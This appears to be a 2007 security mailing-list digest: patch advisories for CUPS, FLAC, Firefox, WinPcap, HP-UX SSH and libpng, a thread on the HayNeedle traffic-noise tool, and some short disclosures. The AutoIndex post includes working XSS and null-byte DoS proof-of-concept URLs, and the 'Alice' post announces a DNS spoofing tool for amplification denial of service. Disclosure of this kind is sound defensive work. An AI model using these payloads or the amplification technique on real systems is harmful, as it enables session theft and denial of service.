PR07-13: Cross-site Scripting / HTML injection on F5 FirePass 4100 SSL VPN 'download_plugin.php3' server-side script
Date Found: 19th June 2007 Successfully tested on: version 5.5.2 F5 Networks has confirmed the following versions to be vulnerable: FirePass versions 5.4 - 5.5.2 FirePass versions 6.0 - 6.0.1 Description: F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the "backurl" parameter processed by the "download_plugin.php3" server-side script. No authentication is required to exploit this vulnerability. Consequences: An attacker may be able to cause execution of malicious scripting code in the browser of a user who visits a specially-crafted URL to an F5 Firepass device, or visits a malicious page that makes a request to such URL. Such code would run within the security context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e. admin session IDs) to unauthorised third parties. Severity: Medium/High Credits: Jan Fry [jan.fry [at] procheckup.com] and Adrian Pastor [adrian.pastor [at] procheckup.com] of ProCheckUp Ltd Fix: F5 Networks has issued SOL7498: https://support.f5.com/kb/en-us/solutions/public/7000/400/sol7498.html More information, including proof of concept can be found on: http://www.procheckup.com/Vulnerability_PR07-13.php
[ GLSA 200711-16 ] CUPS: Memory corruption
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200711-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: CUPS: Memory corruption Date: November 12, 2007 Bugs: #196736 ID: 200711-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis CUPS contains a boundary checking error that might lead to the execution of arbitrary code. Background == CUPS provides a portable printing layer for UNIX-based operating systems. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-print/cups < 1.2.12-r2 >= 1.2.12-r2 Description === Alin Rad Pop (Secunia Research) discovered an off-by-one error in the ippReadIO() function when handling Internet Printing Protocol (IPP) tags that might allow to overwrite one byte on the stack. Impact == A local attacker could send a specially crafted IPP request containing "textWithLanguage" or "nameWithLanguage" tags, leading to a Denial of Service or the execution of arbitrary code with the privileges of the "lp" user. If CUPS is configured to allow network printing, this vulnerability might be remotely exploitable. Workaround == To avoid remote exploitation, network access to CUPS servers on port 631/udp should be restricted. In order to do this, update the "Listen" setting in cupsd.conf to "Listen localhost:631" or add a rule to the system's firewall. However, this will not avoid local users from exploiting this vulnerability. Resolution == All CUPS users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-print/cups-1.2.12-r2" References == [ 1 ] CVE-2007-4351 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4351 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-16.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHOMwLuhJ+ozIKI5gRAj2kAJ4nBFEivR9EjTpMWFgHR/urJr57WQCffDR7 JQt3M+r4ykECz1I05+c9C00= =gIFU -END PGP SIGNATURE-
[ MDKSA-2007:204-1 ] - Updated cups packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:204-1 http://www.mandriva.com/security/ ___ Package : cups Date: November 12, 2007 Affected: 2008.0 ___ Problem Description: Alin Rad Pop of Secunia Research discovered a vulnerability in CUPS that can be exploited by malicious individuals to execute arbitrary code. This flaw is due to a boundary error when processing IPP (Internet Printing Protocol) tags. Update: Due to incorrect build requirements/conflicts, the cups-config in Mandriva Linux 2008.0 was displaying the full CFLAGS and libs instead of just the libraries when 'cups-config --libs' was invoked. This update corrects the cups-config behaviour. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4351 ___ Updated Packages: Mandriva Linux 2008.0: 066d0553d0d41408d9f0b0d89b9299de 2008.0/i586/cups-1.3.0-3.2mdv2008.0.i586.rpm 761125ca708cd22b2360e84f36674051 2008.0/i586/cups-common-1.3.0-3.2mdv2008.0.i586.rpm 24a6797ad61c1ee82710480cba57c912 2008.0/i586/cups-serial-1.3.0-3.2mdv2008.0.i586.rpm 2c6d558345461a1813ea8ffa9b93be4e 2008.0/i586/libcups2-1.3.0-3.2mdv2008.0.i586.rpm 30bd123775b39ffd80e94d3232dbd5ce 2008.0/i586/libcups2-devel-1.3.0-3.2mdv2008.0.i586.rpm 1d147d09513abcb5e556a02dcb4272aa 2008.0/i586/php-cups-1.3.0-3.2mdv2008.0.i586.rpm cfcb64cb2bc0af7b05c3770138a9311c 2008.0/SRPMS/cups-1.3.0-3.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 617534198402457ccce075bfc8341a2d 2008.0/x86_64/cups-1.3.0-3.2mdv2008.0.x86_64.rpm d7f56b65a853c2030ee85a5b9db1b800 2008.0/x86_64/cups-common-1.3.0-3.2mdv2008.0.x86_64.rpm 48c4cd42cd19179ffeb003e1fed91f62 2008.0/x86_64/cups-serial-1.3.0-3.2mdv2008.0.x86_64.rpm 2760af902f9937b89dfb836a07b373b2 2008.0/x86_64/lib64cups2-1.3.0-3.2mdv2008.0.x86_64.rpm a9cb35f7fa4cf7b55ef5730690b04aff 2008.0/x86_64/lib64cups2-devel-1.3.0-3.2mdv2008.0.x86_64.rpm 7de4fe03981dbf79b9324e6e3fe244e4 2008.0/x86_64/php-cups-1.3.0-3.2mdv2008.0.x86_64.rpm cfcb64cb2bc0af7b05c3770138a9311c 2008.0/SRPMS/cups-1.3.0-3.2mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHOKAumqjQ0CJFipgRAgfXAKCXXTmPhErJH4yPYSvJGYaC1ESFqACfUhpO 49ACWgewrpwKsu3pjlqBwbo= =RPar -END PGP SIGNATURE-
[ GLSA 200711-15 ] FLAC: Buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200711-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: FLAC: Buffer overflow Date: November 12, 2007 Bugs: #195700 ID: 200711-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple integer overflow vulnerabilities were found in FLAC possibly allowing for the execution of arbitrary code. Background == The Xiph.org Free Lossless Audio Codec (FLAC) library is the reference implementation of the FLAC audio file format. It contains encoders and decoders in library and executable form. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-libs/flac < 1.2.1-r1>= 1.2.1-r1 Description === Sean de Regge reported multiple integer overflows when processing FLAC media files that could lead to improper memory allocations resulting in heap-based buffer overflows. Impact == A remote attacker could entice a user to open a specially crafted FLAC file or network stream with an application using FLAC. This might lead to the execution of arbitrary code with privileges of the user playing the file. Workaround == There is no known workaround at this time. Resolution == All FLAC users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/flac-1.2.1-r1" You should also run revdep-rebuild to rebuild any packages that depend on older versions of FLAC: # revdep-rebuild --library=libFLAC.* References == [ 1 ] CVE-2007-4619 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4619 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-15.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHOMjJuhJ+ozIKI5gRAi72AJ4imCmGCJXwEj2aOLTpmaYJCYoOuACeK8Bk alx8UWZK7VQfpRDTMVv+5HM= =WEeV -END PGP SIGNATURE-
Re: Standing Up Against German Laws - Project HayNeedle
On Nov 12, 2007, at 11:27 AM, Matt D. Harris wrote: However some of these issues can be mitigated without too much trouble. For example, one could have a dynamically growing dictionary of words to search for based on random words in random results pages that it grabs. At the very least, this would kill any attempts to filter it out of the data mining system. That'd be a significantly different approach. Even grabbing data from the previously browsed cache would also work, as far as seeding dictionary goes. If the point of the system is primarily to create plausible deniability for the end-user, that is, to allow them to say "hayneedle hit the site, not me, so I am innocent", then I'd say it could be effective in that regard barring some proviso in the law that allow them to persecute someone who did not actually even visit a site of their own volition. Beyond that, it's also effective in terms of turning up the noise to signal ratio and making this law that much less effective, while placing a greater burden of ISPs who are then more likely to lobby against it ever more vigorously all while remaining entirely 'white area' in terms of functionality. If I read the law correctly, it requires retention of "what IP connected to another IP" and "which phone number called where." It doesn't bother retaining the URL called (my German is rusty, so I may be a little off in my interpretation). Connecting to a random IP on a random open port (80 and 443, for example) would be a good start to accomplish the goal creating chatter. The issue is that the search terms to find those ports could lead to connecting to a site that increases your profile against general background chatter, even as it is raised with random connection traffic. In that light, I'd regard use of something akin to TOR a slightly better solution for protecting privacy and filling up logs. I understand your post, but I don't think Mr. Ziegler was over- selling his product's effectiveness beyond what it is really capable of. I wasn't saying there was overselling the effectiveness. I do think the approach is innately flawed from a privacy standpoint.
[ GLSA 200711-14 ] Mozilla Firefox, SeaMonkey, XULRunner: Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200711-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla Firefox, SeaMonkey, XULRunner: Multiple vulnerabilities Date: November 12, 2007 Bugs: #196480 ID: 200711-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been discovered in Mozilla Firefox, SeaMonkey and XULRunner, potentially allowing to compromise a user's system. Background == Mozilla Firefox is a cross-platform web browser from Mozilla. SeaMonkey is a free, cross-platform Internet suite. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-client/mozilla-firefox < 2.0.0.9 >= 2.0.0.9 2 www-client/mozilla-firefox-bin < 2.0.0.9 >= 2.0.0.9 3 www-client/seamonkey < 1.1.6 >= 1.1.6 4 www-client/seamonkey-bin < 1.1.6 >= 1.1.6 5 net-libs/xulrunner < 1.8.1.9 >= 1.8.1.9 --- 5 affected packages on all of their supported architectures. --- Description === Multiple vulnerabilities have been reported in Mozilla Firefox and SeaMonkey. Various errors in the browser engine and the Javascript engine can be exploited to cause a memory corruption (CVE-2007-5339 and CVE-2007-5340). Before being used in a request, input passed to the user ID when making an HTTP request with digest authentication is not properly sanitised (CVE-2007-2292). The titlebar can be hidden by a XUL markup language document (CVE-2007-5334). Additionally, an error exists in the handling of "smb:" and "sftp:" URI schemes on systems with gnome-vfs support (CVE-2007-5337). An unspecified error in the handling of "XPCNativeWrappers" and not properly implementing JavaScript onUnload() handlers may allow the execution of arbitrary Javascript code (CVE-2007-5338 and CVE-2007-1095). Another error is triggered by using the addMicrosummaryGenerator sidebar method to access file: URIs (CVE-2007-5335). Impact == A remote attacker could exploit these issues to execute arbitrary code, gain the privileges of the user running the application, disclose sensitive information, conduct phishing attacks, and read and manipulate certain data. Workaround == There is no known workaround at this time. Resolution == All Mozilla Firefox users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-2.0.0.9" All Mozilla Firefox binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-2.0.0.9" All SeaMonkey users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-1.1.6" All SeaMonkey binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-bin-1.1.6" All XULRunner users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/xulrunner-1.8.1.9" References == [ 1 ] CVE-2007-1095 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1095 [ 2 ] CVE-2007-2292 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2292 [ 3 ] CVE-2007-5334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5334 [ 4 ] CVE-2007-5335 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5335 [ 5 ] CVE-2007-5337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5337 [ 6 ] CVE-2007-5338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5338 [ 7 ] CVE-2007-5339 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5339 [ 8 ] CVE-2007-5340 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5340 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200711-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or al
AutoIndex <= 2.2.2 Cross Site Scripting and Denial of Service
== AutoIndex <= 2.2.2 Cross Site Scripting and Denial of Service == Author: L4teral Impact: Cross Site Scripting Denial of Service (DoS) Status: patch available -- Affected software description: -- Application: AutoIndex Version: <= 2.2.2/2.2.3 Vendor: http://autoindex.sourceforge.net -- Vulnerability: -- 1. The variable $_SERVER['PHP_SELF'] is not properly sanitized leading to cross site scripting. 2. The use of unsanitized user input causes an error in the recursive calculation of the size of a directory leading to cpu time/memory consumption until the process gets killed. PoC/Exploit: 1. http:///AutoIndex/index.php/">alert(document.cookie) 2. http:///AutoIndex/index.php?dir=%00 - Solution: - update to version 2.2.4. - Timeline: - 2007-11-05 - vendor informed 2007-11-05 - vendor released version 2.2.3 (fixing XSS) 2007-11-09 - vendor released version 2.2.4 (fixing DoS) 2007-11-12 - public disclosure
HPSBUX02287 SSRT071485 rev.1 - HP-UX Running HP Secure Shell, Remotely Gain Extended Privileges
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01271085 Version: 1 HPSBUX02287 SSRT071485 rev.1 - HP-UX Running HP Secure Shell, Remotely Gain Extended Privileges NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-11-07 Last Updated: 2007-11-07 Potential Security Impact: Remotely gain extended privileges Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX running HP Secure Shell. The vulnerability could be exploited remotely to gain extended privileges. References: CVE-2007-4752 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, and B.11.31 running HP Secure Shell BACKGROUND To determine if an HP-UX system has an affected version, search the output of "swlist -a revision -l fileset" for one of the filesets listed below. For affected systems verify that the recommended action has been taken. AFFECTED VERSIONS HP-UX B.11.11 == Secure_Shell.SECURE_SHELL action: install revision A.04.70.003 or subsequent URL: http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=T1471AA HP-UX B.11.23 == Secure_Shell.SECURE_SHELL action: install revision A.04.70.004 or subsequent URL: http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=T1471AA HP-UX B.11.31 == Secure_Shell.SECURE_SHELL action: install revision A.04.70.005 or subsequent URL: http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=T1471AA END AFFECTED VERSIONS RESOLUTION HP has provided the following software updates to resolve this vulnerability. The updates are available for download from: http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=T1471AA OS Release HP Secure Shell Version == HP-UX B.11.11 (11i v1) A.04.70.003 or subsequent HP-UX B.11.23 (11i v2) A.04.70.004 or subsequent HP-UX B.11.31 (11i v3) A.04.70.005 or subsequent == MANUAL ACTIONS: Yes - Update PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa HISTORY: Version 1 (rev.1) - 07 November 2007 Initial Release Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP p
RFID: Security Briefings
Hi, I just published a presentation, that is an overview, about the RFID technology and the related security menaces. I hope it can be useful :-) The presentation can be found at the following link: http://www.rosiello.org/archivio/rfid-angelo-rosiello.pdf Thank you, Angelo Rosiello http://www.rosiello.org/
Re: Standing Up Against German Laws - Project HayNeedle
However some of these issues can be mitigated without too much trouble. For example, one could have a dynamically growing dictionary of words to search for based on random words in random results pages that it grabs. At the very least, this would kill any attempts to filter it out of the data mining system. If the point of the system is primarily to create plausible deniability for the end-user, that is, to allow them to say "hayneedle hit the site, not me, so I am innocent", then I'd say it could be effective in that regard barring some proviso in the law that allow them to persecute someone who did not actually even visit a site of their own volition. Beyond that, it's also effective in terms of turning up the noise to signal ratio and making this law that much less effective, while placing a greater burden of ISPs who are then more likely to lobby against it ever more vigorously all while remaining entirely 'white area' in terms of functionality. I understand your post, but I don't think Mr. Ziegler was over-selling his product's effectiveness beyond what it is really capable of. Take care, Matt johan beisser wrote: On Nov 10, 2007, at 9:28 AM, Paul Sebastian Ziegler wrote: The mechanism is quite easy: It searches Google for random words and picks random pages among the results, then spiders from there (well it is spidering except that it only follows one URL at a time within a session thus simulating a user). There's a few things wrong with this approach. Most of them were outlined by Bruce Schneier when he reviewed "TrackMeNot"[1] last year. The same issues with TrackMeNot apply to Hayneedle, including potential false positives, and list of word combinations that can be filtered out easily, and well, the list goes on. [1] http://www.schneier.com/blog/archives/2006/08/trackmenot_1.html -- /* * mdh - Solitox Networks (Lead Project Engineer) * Facts often matter little, in the face of fervently held perceptions */
Alice - dns spoofer
Hi lists, sorry for crossposting. On the wave of spoofer2.pl, i've recoded that poc in c and created a nice makefile. This tool creates spoofed dns requests. If you set the right domain names (with lots of A records) and dns servers (open, recursive), you can easily get a traffic multiplication effect. In a single word, i't a dos. Enjoy. CtrlAltCa alice-0.1.tar.gz Description: application/gzip
FLEA-2007-0065-1 libpng
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0065-1 Published: 2007-11-11 Rating: Minor Updated Versions: libpng=/[EMAIL PROTECTED]:devel//1/1.2.22-1-0.1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-3 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5266 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5267 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5268 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5269 Description: Previous versions of the libpng package can cause applications to crash when loading malformed PNG files. It is not currently known that this vulnerability can be exploited to execute malicious code. - --- Copyright 2007 Foresight Linux Project Portions Copyright 2007 rPath Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) iQIVAwUBRzfbdNfwEn07iAtZAQJorQ//XpFcKedmytQceCut4A3lgvjh/FXUHlkh wvU6CWI8B9jvDkmd5xH+kGsq+nsYe9VO7kcGDh634FqrAeCVuFFZED7p/IP1hQRC jn7FZQV3vxS+R/iV22iySXKHy1309rOJVR6b2r/TwS0C0wer47CZZhTcnoGV0+TC O13gl9MR1O0PsPnIEEU4Xts9mEGfELtnEDfvTxWFKGgzpIGxSXeL1xqFX1KjdjWb HN8GuWDbjOjmawoj/S7nMX92nts65+IjaVEBbXyNz9K6Te8/BDqJM5XyLnAodoSI +cJUp7qvr84uYQ602/QAsWkWKA7KHuh7E6/VZOvSp/9Y2H2zCHb+s8O6AvXHgo1z iDkHLT9mSxh2LuykXt+f7WI1ltrPSKyOsckvh4hoiu234Cn9wbE8H/l6/0MtWrRZ /e19dkcCJB3cKbBvc2mtzBIzhLMZ9JMCdduDLLvFAacRcjviNQCX+mu/OK6/fP9Y 1MzYD2C+s1wHnVL7nn5XU8+wByenTYlVy2v/azMuhNK1FTS0roYlnnvVThhQfTcg E/ujxxpwFR5fS9SKP0zMzwOaA0eOQZ/fEHSdWD22cYhMIG7vUFiJ1i0cdRp0aETb eV+LWSKB3i6fkFPYjDS6Dr4KCvsLbXiitDhfbzPVuuPsWkSLOvoIJb/skKoPGRGm zh3T+TIN1mA= =X58H -END PGP SIGNATURE-
Cisco IOS Shellcode
High quality versions of the three Cisco IOS shellcode demonstration videos have now been released: http://www.irmplc.com/index.php/153-Embedded-Systems-Security
FLEA-2007-0069-1 perl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0069-1 Published: 2007-11-11 Rating: Minor Updated Versions: perl=/[EMAIL PROTECTED]:devel//1/5.8.7-8.2-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-3 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116 Description: Previous versions of the perl package contain a buffer overflow in the regular expression parsing code which could allow an attacker to execute arbitrary code via a program which uses perl to parse untrusted input as a regular expression. Foresight Linux does not include any such program by default. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) iQIVAwUBRzfiXtfwEn07iAtZAQJZvBAAkyoO3qAWS0vWHBFkQgiCl9vf2The5zoW 5B++Z19q8v1QriFmCoa5FfaLrHHajxt5FzjA4gnxM25YBYrM98XTwj567woz62EX dPxYsNaiR3+nKpnygPwRpbhO4s//KLvPlfGWG3Z37fTUigGcNJEerpFLu0io+ESK qR8gG28zQV0mwvccY/r83KA+vx0mhG7zl9ZrsKzHc/W+dXLrnqxsBNnPtPz0Xvth W2g40wrUJ267f8ZhWigrwxCquJg6X4XBUU2ge0PFveI+AySbxsYhxO8mBF41ZWS4 0yW+9f8X+2cVjiwTv6evShkAm0opW45dETOgL9mKXd0A30tDVXmqlEv2I3dQnWZO fQ1rx+AdTVZ7ZTkrXJ1FvZHMzQ+nMbQOGLg/cuF4uEgnkBDr1qCkPxzM7VtsG5WG IkAIPGqyGrdDfXVdu1hWf3VJYcMl98Ybp34xeWGz5nvO8myvbCZdzWoCcaIHKVsM elgqAEgQQpZ96yIfjLZ9dVivE5sMOTdJQvuhDMunrtOZP3/o+kDNRWIrTIZjYiRg /14fwuOeQxIHqvC1gKCdQFAZ+JcyzCD9ET71oAfXsc6RKTz4xAUrcdLEXbd2Ge2i /+QBMeeGb+tCI+RqREVYuMrtLMap4A3aNPiH9EjFMeGBM7oExU9nmgD1kreEE0Rf i5g5bQ987vM= =p0Vt -END PGP SIGNATURE-
Re: Standing Up Against German Laws - Project HayNeedle
On Nov 10, 2007, at 9:28 AM, Paul Sebastian Ziegler wrote: The mechanism is quite easy: It searches Google for random words and picks random pages among the results, then spiders from there (well it is spidering except that it only follows one URL at a time within a session thus simulating a user). There's a few things wrong with this approach. Most of them were outlined by Bruce Schneier when he reviewed "TrackMeNot"[1] last year. The same issues with TrackMeNot apply to Hayneedle, including potential false positives, and list of word combinations that can be filtered out easily, and well, the list goes on. [1] http://www.schneier.com/blog/archives/2006/08/trackmenot_1.html
iDefense Security Advisory 11.12.07: WinPcap NPF.SYS bpf_filter_init Arbitrary Array Indexing Vulnerability
iDefense Security Advisory 11.12.07 http://labs.idefense.com/intelligence/vulnerabilities/ Nov 12, 2007 I. BACKGROUND WinPcap is a software package that facilitates real-time link-level network access for Windows-based operating systems. A wide range of open-source projects, including Wireshark, use it. More information is available at the project's web site at the following URL. http://www.winpcap.org/ II. DESCRIPTION Local exploitation of an invalid array indexing vulnerability in the NPF.SYS device driver of WinPcap allows attackers to execute arbitrary code in kernel context. The problem specifically exists within the bpf_filter_init function. In several places throughout this function, values supplied from a potential attacker are used as array indexes without proper bounds checking. By making IOCTL requests with specially chosen values, attackers are able to corrupt the stack, or pool memory, within the kernel. III. ANALYSIS Exploitation allows attackers to execute arbitrary code in kernel context. The vulnerable device driver is loaded when WinPcap is initialized. This driver can be set to load on start-up depending on a choice made at installation time. However, this is not the default setting. Normally, the device driver is not loaded until an administrator utilizes a WinPcap dependent application. Once they do, it will become accessible to normal users as well. When a program using this driver exits, it is not unloaded. Attackers will continue to have access until the driver is manually unloaded. If the option to allow normal user access was chosen at installation time, attackers will always have access to this device driver. Consequently, a local attacker without administrator privileges would have access to sniff, as well as exploit this vulnerability. IV. DETECTION iDefense has confirmed the existence of this vulnerability in version 4.0.1 of WinPcap as included in Wireshark 0.99.6a. The version of NPF.SYS tested was 4.0.0.901. iDefense suspects older versions to also be vulnerable. V. WORKAROUND iDefense is currently unaware of any effective workaround for this issue. VI. VENDOR RESPONSE The WinPcap Team has addressed this vulnerability by releasing version 4.0.2 of the WinPcap software. For more information, see the following URL. http://www.winpcap.org/misc/changelog.htm VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-5756 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 10/30/2007 Initial vendor notification 10/30/2007 Initial vendor response 11/12/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
FLEA-2007-0067-1 pidgin
